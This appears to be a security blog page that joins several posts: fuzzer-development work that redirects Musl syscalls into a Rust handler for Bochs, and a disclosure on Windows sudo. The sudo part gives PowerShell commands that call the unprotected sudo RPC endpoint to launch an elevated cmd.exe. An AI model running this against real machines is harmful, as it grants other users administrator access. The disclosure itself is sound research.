For syscalls, there is a well defined calling convention. Syscalls take a βsyscall numberβ which determines what syscall you want in eax
, then the next n parameters are passed in via the registers in order: rdi
, rsi
, rdx
, r10
, r8
, and r9
.
This is pretty intuitive but the syntax is a bit mystifying, like for example on those __asm__ __volatile__ ("syscall"
lines, itβs kind of hard to see what itβs doing. Letβs take the most convoluted function, __syscall6
and break down all the syntax. We can think of the assembly syntax as a format string like for printing, but this is for emitting code instead:
unsigned long ret
is where we will store the result of the syscall to indicate whether or not it was a success. In the raw assembly, we can see that there is a:
and then"=a(ret)"
, this first set of parameters after the initial colon is to indicate output parameters. We are saying please store the result ineax
(symbolized in the syntax asa
) into the variableret
.- The next series of params after the next colon are input parameters.
"a"(n)
is saying, place the function argumentn
, which is the syscall number, intoeax
which is symbolized again asa
. Next is storea1
inrdi
, which is symbolized asD
, and so forth - Arguments 4-6 are placed in registers above, for instance the syntax
register long r10 __asm__("r10") = a4;
is a strong compiler hint to storea4
intor10
. And then later we see"r"(r10)
says input the variabler10
into a general purpose register (which is already satisfied). - The last set of colon-separated values are known as βclobbersβ. These tell the compiler what our syscall is expected to corrupt. So the syscall calling convention specifies that
rcx
,r11
, and memory may be overwritten by the kernel.
With the syntax explained, we see what is taking place. The job of these functions is to translate the function call into a syscall. The calling convention for functions, known as the System V ABI, is different from that of a syscall, the register utilization differs. So when we call __syscall6
and pass its arguments, each argument is stored in the following register:
n
βrax
a1
βrdi
a2
βrsi
a3
βrdx
a4
βrcx
a5
βr8
a6
βr9
So the compiler will take those function args from the System V ABI and translate them into the syscall via the assembly that we explained above. So now these are the functions we need to edit so that we donβt emit that syscall
instruction and instead call into Lucid.
Conditionally Calling Into Lucid
So we need a way in these function bodies to call into Lucid instead of emit syscall
instructions. To do so we need to define our own calling convention, for now Iβve been using the following:
r15
: contains the address of the global Lucid execution contextr14
: contains an βexit reasonβ which is just anenum
explaining why we are context switchingr13
: is the base address of the register bank structure of the Lucid execution context, we need this memory section to store our register values to save our state when we context switchr12
: stores the address of the βexit handlerβ which is the function to call to context switch
This will no doubt change some as we add more features/functionality. I should also note that it is the functions responibility to preserve these values according to the ABI, so the function caller expects that these wonβt change during a function call, well we are changing them. Thatβs ok because in the function where we use them, we are marking them as clobbers, remember? So the compiler is aware that they change, what the compiler is going to do now is before it executes any code, itβs going to push those registers onto the stack to save them, and then before exiting, pop them back into the registers so that the caller gets back the expected values. So weβre free to use them.
So to alter the functions, I changed the function logic to first check if we have a global Lucid execution context, if we do not, then execute the normal Musl function, you can see that here as Iβve moved the normal function logic out to a separate function called __syscall6_original
:
static __inline long __syscall6_original(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
unsigned long ret;
register long r10 __asm__("r10") = a4;
register long r8 __asm__("r8") = a5;
register long r9 __asm__("r9") = a6;
__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2), "d"(a3), "r"(r10),
"r"(r8), "r"(r9) : "rcx", "r11", "memory");
return ret;
}
static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
if (!g_lucid_ctx) { return __syscall6_original(n, a1, a2, a3, a4, a5, a6); }
However, if we are running under Lucid, I set up our calling convention by explicitly setting the registers r12-r15
in accordance to what we are expecting there when we context-switch to Lucid.
static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
if (!g_lucid_ctx) { return __syscall6_original(n, a1, a2, a3, a4, a5, a6); }
register long ret;
register long r12 __asm__("r12") = (size_t)(g_lucid_ctx->exit_handler);
register long r13 __asm__("r13") = (size_t)(&g_lucid_ctx->register_bank);
register long r14 __asm__("r14") = SYSCALL;
register long r15 __asm__("r15") = (size_t)(g_lucid_ctx);
Now with our calling convention set up, we can then use inline assembly as before. Notice weβve replaced the syscall
instruction with call r12
, calling our exit handler as if itβs a normal function:
__asm__ __volatile__ (
"mov %1, %%rax\n\t"
"mov %2, %%rdi\n\t"
"mov %3, %%rsi\n\t"
"mov %4, %%rdx\n\t"
"mov %5, %%r10\n\t"
"mov %6, %%r8\n\t"
"mov %7, %%r9\n\t"
"call *%%r12\n\t"
"mov %%rax, %0\n\t"
: "=r" (ret)
: "r" (n), "r" (a1), "r" (a2), "r" (a3), "r" (a4), "r" (a5), "r" (a6),
"r" (r12), "r" (r13), "r" (r14), "r" (r15)
: "rax", "rcx", "r11", "memory"
);
return ret;
So now weβre calling the exit handler instead of syscalling into the kernel, and all of the registers are setup as if weβre syscalling. Weβve also got our calling convention registers set up. Letβs see what happens when we land on the exit handler, a function that is implemented in Rust inside Lucid. We are jumping from Bochs code directly to Lucid code!
Implementing a Context Switch
The first thing we need to do is create a function body for the exit handler. In Rust, we can make the function visible to Bochs (via our edited Musl) by declaring the function as an extern C function and giving it a label in inline assembly as such:
extern "C" { fn exit_handler(); }
global_asm!(
".global exit_handler",
"exit_handler:",
So this function is what will be jumped to by Bochs when it tries to syscall under Lucid. The first thing we need to consider is that we need to keep track of Bochsβ state the way the kernel would upon entry to the context switching routine. The first thing weβll want to save off is the general purpose registers. By doing this, we can preserve the state of the registers, but also unlock them for our own use. Since we save them first, weβre then free to use them. Remember that our calling convention uses r13
to store the base address of the execution context register bank:
#[repr(C)]
#[derive(Default, Clone)]
pub struct RegisterBank {
pub rax: usize,
rbx: usize,
rcx: usize,
pub rdx: usize,
pub rsi: usize,
pub rdi: usize,
rbp: usize,
rsp: usize,
pub r8: usize,
pub r9: usize,
pub r10: usize,
r11: usize,
r12: usize,
r13: usize,
r14: usize,
r15: usize,
}
We can save the register values then by doing this:
// Save the GPRS to memory
"mov [r13 + 0x0], rax",
"mov [r13 + 0x8], rbx",
"mov [r13 + 0x10], rcx",
"mov [r13 + 0x18], rdx",
"mov [r13 + 0x20], rsi",
"mov [r13 + 0x28], rdi",
"mov [r13 + 0x30], rbp",
"mov [r13 + 0x38], rsp",
"mov [r13 + 0x40], r8",
"mov [r13 + 0x48], r9",
"mov [r13 + 0x50], r10",
"mov [r13 + 0x58], r11",
"mov [r13 + 0x60], r12",
"mov [r13 + 0x68], r13",
"mov [r13 + 0x70], r14",
"mov [r13 + 0x78], r15",
This will save the register values to memory in the memory bank for preservation. Next, weβll want to preserve the CPUβs flags, luckily there is a single instruction for this purpose which pushes the flag values to the stack called pushfq
.
Weβre using a pure assembly stub right now but weβd like to start using Rust at some point, that point is now. We have saved all the state we can for now, and itβs time to call into a real Rust function that will make programming and implementation easier. To call into a function though, we need to set up the register values to adhere to the function calling ABI remember. Two pieces of data that we want to be accessible are the execution context and the reason why we exited. Those are in r15
and r14
respectively remember. So we can simply place those into the registers used for passing function arguments and call into a Rust function called lucid_handler
now.
// Save the CPU flags
"pushfq",
// Set up the function arguments for lucid_handler according to ABI
"mov rdi, r15", // Put the pointer to the context into RDI
"mov rsi, r14", // Put the exit reason into RSI
// At this point, we've been called into by Bochs, this should mean that
// at the beginning of our exit_handler, rsp was only 8-byte aligned and
// thus, by ABI, we cannot legally call into a Rust function since to do so
// requires rsp to be 16-byte aligned. Luckily, `pushfq` just 16-byte
// aligned the stack for us and so we are free to `call`
"call lucid_handler",
So now, we are free to execute real Rust code! Here is lucid_handler
as of now:
// This is where the actual logic is for handling the Bochs exit, we have to
// use no_mangle here so that we can call it from the assembly blob. We need
// to see why we've exited and dispatch to the appropriate function
#[no_mangle]
fn lucid_handler(context: *mut LucidContext, exit_reason: i32) {
// We have to make sure this bad boy isn't NULL
if context.is_null() {
println!("LucidContext pointer was NULL");
fatal_exit();
}
// Ensure that we have our magic value intact, if this is wrong, then we
// are in some kind of really bad state and just need to die
let magic = LucidContext::ptr_to_magic(context);
if magic != CTX_MAGIC {
println!("Invalid LucidContext Magic value: 0x{:X}", magic);
fatal_exit();
}
// Before we do anything else, save the extended state
let save_inst = LucidContext::ptr_to_save_inst(context);
if save_inst.is_err() {
println!("Invalid Save Instruction");
fatal_exit();
}
let save_inst = save_inst.unwrap();
// Get the save area
let save_area =
LucidContext::ptr_to_save_area(context, SaveDirection::FromBochs);
if save_area == 0 || save_area % 64 != 0 {
println!("Invalid Save Area");
fatal_exit();
}
// Determine save logic
match save_inst {
SaveInst::XSave64 => {
// Retrieve XCR0 value, this will serve as our save mask
let xcr0 = unsafe { _xgetbv(0) } as u64;
// Call xsave to save the extended state to Bochs save area
unsafe { _xsave64(save_area as *mut u8, xcr0); }
},
SaveInst::FxSave64 => {
// Call fxsave to save the extended state to Bochs save area
unsafe { _fxsave64(save_area as *mut u8); }
},
_ => (), // NoSave
}
// Try to convert the exit reason into BochsExit
let exit_reason = BochsExit::try_from(exit_reason);
if exit_reason.is_err() {
println!("Invalid Bochs Exit Reason");
fatal_exit();
}
let exit_reason = exit_reason.unwrap();
// Determine what to do based on the exit reason
match exit_reason {
BochsExit::Syscall => {
syscall_handler(context);
},
}
// Restore extended state, determine restore logic
match save_inst {
SaveInst::XSave64 => {
// Retrieve XCR0 value, this will serve as our save mask
let xcr0 = unsafe { _xgetbv(0) } as u64;
// Call xrstor to restore the extended state from Bochs save area
unsafe { _xrstor64(save_area as *const u8, xcr0); }
},
SaveInst::FxSave64 => {
// Call fxrstor to restore the extended state from Bochs save area
unsafe { _fxrstor64(save_area as *const u8); }
},
_ => (), // NoSave
}
}
There are a few important pieces here to discuss.
Extended State
Letβs start with this concept of the save area. What is that? Well, we already have a general purpose registers saved and our CPU flags, but there is whatβs called an βextended stateβ of the processor that we havenβt saved. This can include the floating-point registers, vector registers, and other state information used by the processor to support advanced execution features like SIMD (Single Instruction, Multiple Data) instructions, encryption, and other stuff like control registers. Is this important? Itβs hard to say, we donβt know wtf Bochs will do, it might count on these to be preserved across function calls so I thought weβd go ahead and do it.
To save this state, you just execute the appropriate saving instruction for your CPU. To do this somewhat dynamically at runtime, I just query the processor for at least two saving instructions to see if theyβre available, if theyβre not, for now, we donβt support anything else. So when we create the execution context initially, we determine what save instruction weβll need and store that answer in the execution context. Then on a context switch, we can dynamically use the approriate extended state saving function. This works because we donβt use any of the extended state in lucid_handler
yet so itβs preserved still. You can see how I checked during context initialization here:
pub fn new() -> Result<Self, LucidErr> {
// Check for what kind of features are supported we check from most
// advanced to least
let save_inst = if std::is_x86_feature_detected!("xsave") {
SaveInst::XSave64
} else if std::is_x86_feature_detected!("fxsr") {
SaveInst::FxSave64
} else {
SaveInst::NoSave
};
// Get save area size
let save_size: usize = match save_inst {
SaveInst::NoSave => 0,
_ => calc_save_size(),
};
The way this works is the processor takes a pointer to memory where you want it saved and also how much you want saved, like what specific states. I just maxed out the amount of state I want saved and asked the CPU how much memory that would be:
// Standalone function to calculate the size of the save area for saving the
// extended processor state based on the current processor's features. `cpuid`
// will return the save area size based on the value of the XCR0 when ECX==0
// and EAX==0xD. The value returned to EBX is based on the current features
// enabled in XCR0, while the value returned in ECX is the largest size it
// could be based on CPU capabilities. So out of an abundance of caution we use
// the ECX value. We have to preserve EBX or rustc gets angry at us. We are
// assuming that the fuzzer and Bochs do not modify the XCR0 at any time.
fn calc_save_size() -> usize {
let save: usize;
unsafe {
asm!(
"push rbx",
"mov rax, 0xD",
"xor rcx, rcx",
"cpuid",
"pop rbx",
out("rax") _, // Clobber
out("rcx") save, // Save the max size
out("rdx") _, // Clobbered by CPUID output (w eax)
);
}
// Round up to the nearest page size
(save + PAGE_SIZE - 1) & !(PAGE_SIZE - 1)
}
I page align the result and then map that memory during execution context initialization and save the memory address to the execution state. Now at run time in lucid_handler
we can save the extended state:
// Determine save logic
match save_inst {
SaveInst::XSave64 => {
// Retrieve XCR0 value, this will serve as our save mask
let xcr0 = unsafe { _xgetbv(0) } as u64;
// Call xsave to save the extended state to Bochs save area
unsafe { _xsave64(save_area as *mut u8, xcr0); }
},
SaveInst::FxSave64 => {
// Call fxsave to save the extended state to Bochs save area
unsafe { _fxsave64(save_area as *mut u8); }
},
_ => (), // NoSave
}
Right now, all weβre handling for exit reasons are syscalls, so we invoke our syscall handler and then restore the extended state before returning back to the exit_handler
assembly stub:
// Determine what to do based on the exit reason
match exit_reason {
BochsExit::Syscall => {
syscall_handler(context);
},
}
// Restore extended state, determine restore logic
match save_inst {
SaveInst::XSave64 => {
// Retrieve XCR0 value, this will serve as our save mask
let xcr0 = unsafe { _xgetbv(0) } as u64;
// Call xrstor to restore the extended state from Bochs save area
unsafe { _xrstor64(save_area as *const u8, xcr0); }
},
SaveInst::FxSave64 => {
// Call fxrstor to restore the extended state from Bochs save area
unsafe { _fxrstor64(save_area as *const u8); }
},
_ => (), // NoSave
}
Letβs see how we handle syscalls.
Implementing Syscalls
When we run the test program normally, not under Lucid, we get the following output:
Argument count: 1
Args:
-./test
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
g_lucid_ctx: 0
And when we run it with strace
, we can see what syscalls are made:
execve("./test", ["./test"], 0x7ffca76fee90 /* 49 vars */) = 0
arch_prctl(ARCH_SET_FS, 0x7fd53887f5b8) = 0
set_tid_address(0x7fd53887f7a8) = 850649
ioctl(1, TIOCGWINSZ, {ws_row=40, ws_col=110, ws_xpixel=0, ws_ypixel=0}) = 0
writev(1, [{iov_base="Argument count: 1", iov_len=17}, {iov_base="\n", iov_len=1}], 2Argument count: 1
) = 18
writev(1, [{iov_base="Args:", iov_len=5}, {iov_base="\n", iov_len=1}], 2Args:
) = 6
writev(1, [{iov_base=" -./test", iov_len=10}, {iov_base="\n", iov_len=1}], 2 -./test
) = 11
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="g_lucid_ctx: 0", iov_len=14}, {iov_base="\n", iov_len=1}], 2g_lucid_ctx: 0
) = 15
exit_group(0) = ?
+++ exited with 0 +++
We see that the first two syscalls are involved with process creation, we donβt need to worry about those our process is already created and loaded in memory. The other syscalls are ones weβll need to handle, things like set_tid_address
, ioctl
, and writev
. We donβt worry about exit_group
yet as that will be a fatal exit condition because Bochs shouldnβt exit if weβre snapshot fuzzing.
So we can use our saved register bank information to extract the syscall number from eax
and dispatch to the appropriate syscall function! You can see that logic here:
// This is where we process Bochs making a syscall. All we need is a pointer to
// the execution context, and we can then access the register bank and all the
// peripheral structures we need
#[allow(unused_variables)]
pub fn syscall_handler(context: *mut LucidContext) {
// Get a handle to the register bank
let bank = LucidContext::get_register_bank(context);
// Check what the syscall number is
let syscall_no = (*bank).rax;
// Get the syscall arguments
let arg1 = (*bank).rdi;
let arg2 = (*bank).rsi;
let arg3 = (*bank).rdx;
let arg4 = (*bank).r10;
let arg5 = (*bank).r8;
let arg6 = (*bank).r9;
match syscall_no {
// ioctl
0x10 => {
//println!("Handling ioctl()...");
// Make sure the fd is 1, that's all we handle right now?
if arg1 != 1 {
println!("Invalid `ioctl` fd: {}", arg1);
fatal_exit();
}
// Check the `cmd` argument
match arg2 as u64 {
// Requesting window size
libc::TIOCGWINSZ => {
// Arg 3 is a pointer to a struct winsize
let winsize_p = arg3 as *mut libc::winsize;
// If it's NULL, return an error, we don't set errno yet
// that's a weird problem
// TODO: figure out that whole TLS issue yikes
if winsize_p.is_null() {
(*bank).rax = usize::MAX;
return;
}
// Deref the raw pointer
let winsize = unsafe { &mut *winsize_p };
// Set to some constants
winsize.ws_row = WS_ROW;
winsize.ws_col = WS_COL;
winsize.ws_xpixel = WS_XPIXEL;
winsize.ws_ypixel = WS_YPIXEL;
// Return success
(*bank).rax = 0;
},
_ => {
println!("Unhandled `ioctl` argument: 0x{:X}", arg1);
fatal_exit();
}
}
},
// writev
0x14 => {
//println!("Handling writev()...");
// Get the fd
let fd = arg1 as libc::c_int;
// Make sure it's an fd we handle
if fd != STDOUT {
println!("Unhandled writev fd: {}", fd);
}
// An accumulator that we return
let mut bytes_written = 0;
// Get the iovec count
let iovcnt = arg3 as libc::c_int;
// Get the pointer to the iovec
let mut iovec_p = arg2 as *const libc::iovec;
// If the pointer was NULL, just return error
if iovec_p.is_null() {
(*bank).rax = usize::MAX;
return;
}
// Iterate through the iovecs and write the contents
green!();
for i in 0..iovcnt {
bytes_written += write_iovec(iovec_p);
// Update iovec_p
iovec_p = unsafe { iovec_p.offset(1 + i as isize) };
}
clear!();
// Update return value
(*bank).rax = bytes_written;
},
// nanosleep
0x23 => {
//println!("Handling nanosleep()...");
(*bank).rax = 0;
},
// set_tid_address
0xDA => {
//println!("Handling set_tid_address()...");
// Just return Boch's pid, no need to do anything
(*bank).rax = BOCHS_PID as usize;
},
_ => {
println!("Unhandled Syscall Number: 0x{:X}", syscall_no);
fatal_exit();
}
}
}
Thatβs about it! Itβs kind of fun acting as the kernel. Right now our test program doesnβt do much, but I bet weβre going to have to figure out how to deal with things like files and such when using Bochs, but thatβs a different time. Now all there is to do, after setting the return code via rax
, is return back to the exit_handler
stub and back to Bochs gracefully.
Returning Gracefully
// Restore the flags
"popfq",
// Restore the GPRS
"mov rax, [r13 + 0x0]",
"mov rbx, [r13 + 0x8]",
"mov rcx, [r13 + 0x10]",
"mov rdx, [r13 + 0x18]",
"mov rsi, [r13 + 0x20]",
"mov rdi, [r13 + 0x28]",
"mov rbp, [r13 + 0x30]",
"mov rsp, [r13 + 0x38]",
"mov r8, [r13 + 0x40]",
"mov r9, [r13 + 0x48]",
"mov r10, [r13 + 0x50]",
"mov r11, [r13 + 0x58]",
"mov r12, [r13 + 0x60]",
"mov r13, [r13 + 0x68]",
"mov r14, [r13 + 0x70]",
"mov r15, [r13 + 0x78]",
// Return execution back to Bochs!
"ret"
We restore the CPU flags, restore the general purpose registers, and then we simple ret
like weβre done with the function call. Donβt forget we already restored the extended state before within lucid_context
before returning from that function.
Conclusion
And just like that, we have an infrastructure that is capable of handling context switches from Bochs to the fuzzer. It will no doubt change and need to be refactored, but the ideas will remain similar. We can see the output below demonstrates the test program running under Lucid with us handling the syscalls ourselves:
[08:15:56] lucid> Loading Bochs...
[08:15:56] lucid> Bochs mapping: 0x10000 - 0x18000
[08:15:56] lucid> Bochs mapping size: 0x8000
[08:15:56] lucid> Bochs stack: 0x7F8A50FCF000
[08:15:56] lucid> Bochs entry: 0x11058
[08:15:56] lucid> Creating Bochs execution context...
[08:15:56] lucid> Starting Bochs...
Argument count: 4
Args:
-./bochs
-lmfao
-hahahah
-yes!
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
g_lucid_ctx: 0x55f27f693cd0
Unhandled Syscall Number: 0xE7
Next Up?
Next we will compile Bochs against Musl and work on getting it to work. Weβll need to implement all of its syscalls as well as get it running a test target that weβll want to snapshot and run over and over. So the next blogpost should be a Bochs that is syscall-sandboxed snapshotting and rerunning a hello world type target. Until then!
Bypassing EDRs With EDR-Preloading
Sudo On Windows a Quick Rundown
Background
The Windows Insider Preview build 26052 just shipped with a sudo command, I thought I'd just take a quick peek to see what it does and how it does it. This is only a short write up of my findings, I think this code is probably still in early stages so I wouldn't want it to be treated too harshly. You can see the official announcement here.
To run a command using sudo you can just type:
C:\> sudo powershell.exe
The first thing to note, if you know anything about the security model of Windows (maybe buy my book, hint hint), is that there's no equivalent to SUID binaries. The only way to run a process with a higher privilege level is to get an existing higher privileged process to start it for you or you have sufficient permissions yourself though say SeImpersonatePrivilege or SeAssignPrimaryToken privilege and have an access token for a more privileged user. Since Vista, the main way of facilitating running more privileged code as a normal user is to use UAC. Therefore this is how sudo is doing it under the hood, itβs just spawning a process via UAC using the ShellExecute runas verb.
This is slightly disappointing as I was hoping the developers would have implemented a sudo service running at a higher privilege level to mediate access. Instead this is really just a fancy executable that you can elevate using the existing UAC mechanisms.Β
The other sad thing is, as is Microsoft tradition, this is a sudo command in name only. It doesnβt support any policies which would allow a user to run specific commands elevated, either with a password requirement or without. Itβll just run anything you give it, and only if that user can pass a UAC elevation prompt.
There are four modes of operation that can be configured in system settings, why this needs to be a system setting I donβt really know.Β
Initially sudo is disabled, running the sudo command just prints βSudo is disabled on this machine. To enable it, go to the Developer Settings page in the Settings appβ. This isnβt because of some fundamental limit on the behavior of the sudo implementation, instead itβs just an Enabled value in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Sudo which is set to 0.
The next option (value 1) is to run the command in a new window. All this does is pass the command line you gave to sudo to ShellExecute with the runas verb. Therefore you just get the normal UAC dialog showing for that command. Considering the general move to using PowerShell for everything you can already do this easily enough with the command:
PS> Start-Process -Verb runas powershell.exe
The third and fourth options (value 2 and 3) are βWith input disabledβ and βInlineβ. Theyβre more or less the same, they can run the command and attach it to the current console window by sharing the standard handles across to the new process. They use the same implementation behind the scenes to do this, a copy of the sudo binary is elevated with the command line and the calling PID of the non-elevated sudo. E.g. it might try and running the following command via UAC:
C:\> sudo elevate -p 1234 powershell.exe
Oddly, as weβll see passing the PID and the command seems to be mostly unnecessary. At best itβs useful if you want to show more information about the command in the UAC dialog, but again as weβll see this isnβt that useful.
The only difference between the two is βWith input disabledβ you can only output text from the elevated application, you canβt interact with it. Whereas the Inline mode allows you to run the command elevated in the same console session. This final mode has the obvious risk that the command is running elevated but attached to a low privileged window. Malicious code could inject keystrokes into that console window to control the privileged process. This was pointed out in the Microsoft blog post linked earlier. However, the blog does say that running it with input disabled mitigates this issue somewhat, as weβll see it does not.
How It Really Works
For the βNew Windowβ mode all sudo is doing is acting as a wrapper to call ShellExecute. For the inline modes it requires a bit more work. Again go back and read the Microsoft blog post, tbh it gives a reasonable overview of how it works. In the blog it has the following diagram, which Iβll reproduce here in case the link dies.
What always gets me interested is where thereβs an RPC channel involved. The reason a communications channel exists is due to the limitations of UAC, it very intentionally doesnβt allow you to attach elevated console processes to an existing low privileged console (grumble UAC is not a security boundary, but then why did this do this if it wasnβt grumble). It also doesnβt pass along a few important settings such as the current directory or the environment which would be useful features to have in a sudo like command. Therefore to do all that it makes sense for the normal privileged sudo to pass that information to the elevated version.
Letβs check out the RPC server using NtObjectManager:
PS> $rpc = Get-RpcServer C:\windows\system32\sudo.exe
PS> Format-RpcServer $rpc
[
Β Β uuid(F691B703-F681-47DC-AFCD-034B2FAAB911),
Β Β version(1.0)
]
interface intf_f691b703_f681_47dc_afcd_034b2faab911 {
Β Β Β Β int server_PrepareFileHandle([in] handle_t _hProcHandle, [in] int p0, [in, system_handle(sh_file)] HANDLE p1);
Β Β Β Β int server_PreparePipeHandle([in] handle_t _hProcHandle, [in] int p0, [in, system_handle(sh_pipe)] HANDLE p1);
Β Β Β Β int server_DoElevationRequest([in] handle_t _hProcHandle, [in, system_handle(sh_process)] HANDLE p0, [in] int p1, [in, string] char* p2, [in, size_is(p4)] byte* p3[], [in] int p4, [in, string] char* p5, [in] int p6, [in] int p7, [in, size_is(p9)] byte* p8[], [in] int p9);
Β Β Β Β void server_Shutdown([in] handle_t _hProcHandle);
}
Of the four functions, the key one is server_DoElevationRequest. This is what actually does the elevation. Doing a quick bit of analysis it seems the parameters correspond to the following:
HANDLE p0 - Handle to the calling process.
int p1 - The type of the new process, 2 being input disabled, 3 being inline.
char* p2 - The command line to execute (oddly, in ANSI characters)
byte* p3[] - Not sure.
int p4 - Size of p3.
char* p5 - The current directory.
int p6 - Not sure, seems to be set to 1 when called.
int p7 - Not sure, seems to be set to 0 when called.
byte* p8 - Pointer to the environment block to use.
int p9 - Length of environment block.
The RPC server is registered to use ncalrpc with the port name being sudo_elevate_PID where PID is just the value passed on the elevation command line for the -p argument. The PID isnβt used for determining the console to attach to, this is instead passed through the HANDLE parameter, and is only used to query its PID to pass to the AttachConsole API.
Also as said before as far as I can tell the command line you want to execute which is also passed to the elevated sudo is unused, itβs in fact this RPC call which is responsible for executing the command properly. This results in something interesting. The elevated copy of sudo doesnβt exit once the new process has started, it in fact keeps the RPC server open and will accept other requests for new processes to attach to. For example you can do the following to get a running elevated sudo instance to attach an elevated command prompt to the current PowerShell console:
PS> $c = Get-RpcClient $rpc
PS> Connect-RpcClient $c -EndpointPath sudo_elevate_4652
PS> $c.server_DoElevationRequest((Get-NtProcess -ProcessId $pid), 3, "cmd.exe", @(), 0, "C:\", 1, 0, @(), 0)
There are no checks for the callerβs PID to make sure itβs really the non-elevated sudo making the request. As long as the RPC server is running you can make the call. Finding the ALPC port is easy enough, you can just enumerate all the ALPC ports in \RPC Control to find them.Β
A further interesting thing to note is that the type parameter (p1) doesnβt have to match the configured sudo mode in settings. Passing 2 to the parameter runs the command with input disabled, but passing any other value runs in the inline mode. Therefore even if sudo is configured in new window mode, thereβs nothing stopping you running the elevated sudo manually, with a trusted Microsoft signed binary UAC prompt and then attaching the inline mode via the RPC service. E.g. you can run sudo using the following PowerShell:
PS> Start-Process -Verb runas -FilePath sudo -ArgumentList "elevate", "-p", 1111, "cmd.exe"
Fortunately sudo will exit immediately if itβs configured in disabled mode, so as long as you donβt change the defaults itβs fine I guess.
I find it odd that Microsoft would rely on UAC when UAC is supposed to be going away. Even more so that this command could have just been a PowerToy as other than the settings UI changes it really doesnβt need any integration with the OS to function. And in fact Iβd argue that it doesnβt need those settings either. At any rate, this is no more a security risk than UAC already is, or is itβ¦
Looking back at how the RPC server is registered can be enlightening:
RPC_STATUS StartRpcServer(RPC_CSTR Endpoint) {
Β Β RPC_STATUS result;
Β Β result = RpcServerUseProtseqEpA("ncalrpc",Β
Β Β Β Β Β Β RPC_C_PROTSEQ_MAX_REQS_DEFAULT, Endpoint, NULL);
Β Β if ( !result )
Β Β {
Β Β Β Β result = RpcServerRegisterIf(server_sudo_rpc_ServerIfHandle, NULL, NULL);
Β Β Β Β if ( !result )
Β Β Β Β Β Β return RpcServerListen(1, RPC_C_PROTSEQ_MAX_REQS_DEFAULT, 0);
Β Β }
Β Β return result;
}
Oh no, thatβs not good. The code doesnβt provide a security descriptor for the ALPC port and it calls RpcServerRegisterIf to register the server, which should basically never be used. This old function doesnβt allow you to specify a security descriptor or a security callback. What this means is that any user on the same system can connect to this service and execute sudo commands. We can double check using some PowerShell:
PS> $as = Get-NtAlpcServer
PS> $sudo = $as | ? Name -Match sudo
PS> $sudo.Name
sudo_elevate_4652
PS> Format-NtSecurityDescriptor $sudo -Summary
<Owner> : BUILTIN\Administrators
<Group> : DESKTOP-9CF6144\None
<DACL>
Everyone: (Allowed)(None)(Connect|Delete|ReadControl)
NT AUTHORITY\RESTRICTED: (Allowed)(None)(Connect|Delete|ReadControl)
BUILTIN\Administrators: (Allowed)(None)(Full Access)
BUILTIN\Administrators: (Allowed)(None)(Full Access)
Yup, the DACL for the ALPC port has the Everyone group. It would even allow restricted tokens with the RESTRICTED SID set such as the Chromium GPU processes to access the server. This is pretty poor security engineering and you wonder how this got approved to ship in such a prominent form.Β
The worst case scenario is if an admin uses this command on a shared server, such as a terminal server then any other user on the system could get their administrator access. Oh well, such is lifeβ¦
I will give Microsoft props though for writing the code in Rust, at least most of it. Of course it turns out that the likelihood that it would have had any useful memory corruption flaws to be low even if they'd written it in ANSI C. This is a good lesson on why just writing in Rust isn't going to save you if you end up just introducing logical bugs instead.
Silly EDR Bypasses and Where To Find Them
An Introduction to Bypassing User Mode EDR Hooks
Fuzzer Development 1: The Soul of a New Machine
Introduction && Credit to Gamozolabs
For a long time Iβve wanted to develop a fuzzer on the blog during my weekends and freetime, but for one reason or another, I could never really conceptualize a project that would be not only worthwhile as an educational tool, but also offer some utility to the fuzzing community in general. Recently, for Linux Kernel exploitation reasons, Iβve been very interested in Nyx. Nyx is a KVM-based hypervisor fuzzer that you can use to snapshot fuzz traditionally hard to fuzz targets. A lot of the time (most of the time?), we want to fuzz things that donβt naturally lend themselves well to traditional fuzzing approaches. When faced with target complexity in fuzzing (leaving input generation and nuance aside for now), there have generally been two approaches.
One approach is to lobotomize the target such that you can isolate a small subset of the target that you find βinterestingβ and only fuzz that. That can look like a lot of things, such as ripping a small portion of a Kernel subsystem out of the kernel and compiling it into a userland application that can be fuzzed with traditional fuzzing tools. This could also look like taking an input parsing routine out of a Web Browser and fuzzing just the parsing logic. This approach has its limits though, in an ideal world, we want to fuzz anything that may come in contact with or be affected by the artifacts of this βinterestingβ target logic. This lobotomy approach is reducing the amount of target state we can explore to a large degree. Imagine if the hypothetical parsing routine successfully produces a data structure that is later consumed by separate target logic that actually reveals a bug. This fuzzing approach fails to explore that possibility.
Another approach, is to effectively sandbox your target in such a way that you can exert some control over its execution environment and fuzz the target in its entirety. This is the approach that fuzzers like Nyx take. By snapshot fuzzing an entire Virtual Machine, we are able to fuzz complex targets such as a Web Browser or Kernel in a way that we are able to explore much more state. Nyx provides us with a way to snapshot fuzz an entire Virtual Machine/system. This is, in my opinion, the ideal way to fuzz things because you are drastically closing the gap between a contrived fuzzing environment and how the target applications exist in the βreal-worldβ. Now obviously there are tradeoffs here, one being the complexity of the fuzzing tooling itself. But, I think given the propensity of complex native code applications to harbor infinite bugs, the manual labor and complexity are worth it in order to increase the bug-finding potential of our fuzzing workflow.
